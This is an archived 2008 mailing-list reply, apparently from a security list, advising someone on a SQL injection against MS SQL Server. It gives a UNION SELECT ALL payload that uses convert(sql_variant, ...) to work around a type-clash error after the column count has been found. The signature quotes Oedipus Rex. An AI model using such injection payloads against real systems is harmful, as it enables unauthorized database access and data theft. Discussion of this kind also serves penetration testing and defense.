Re: SQL Injection: Issue with UNION SELECT ALL

From: Zed Qyves (
Date: Thu Jan 10 2008 - 02:54:54 EST

you seem to have successfully enumerated the number of fields of thefirst query at---------------------------------------------------------------------------------- UNION SELECTALL 1,2,3-- Returns: Operand type clash: text is incompatible with int
       Reference Found:
you can use the convert and sql_variant data type of MS SQL SERVER toget to the right data types as well.
so you query would look like...
------------------------------------------------------------------------------- UNION SELECTALL convert(sql_variant,1),convert(sql_variant,2),convert(sql_variant,3)--
Have fun,ZQ
-- ---------------------------------------------------------------------Κρέωνἐν τῇδ᾽ ἔφασκε γῇ· τὸ δὲ ζητούμενονἁλωτόν, ἐκφεύγειν δὲ τἀμελούμενον.Οιδίπους Τύρρανος [110]---------------------------------------------------------------------CreonIn this our land, so said he, those who seek Shall find; unsought, welose it utterly.Oedipus Rex [110]---------------------------------------------------------------------

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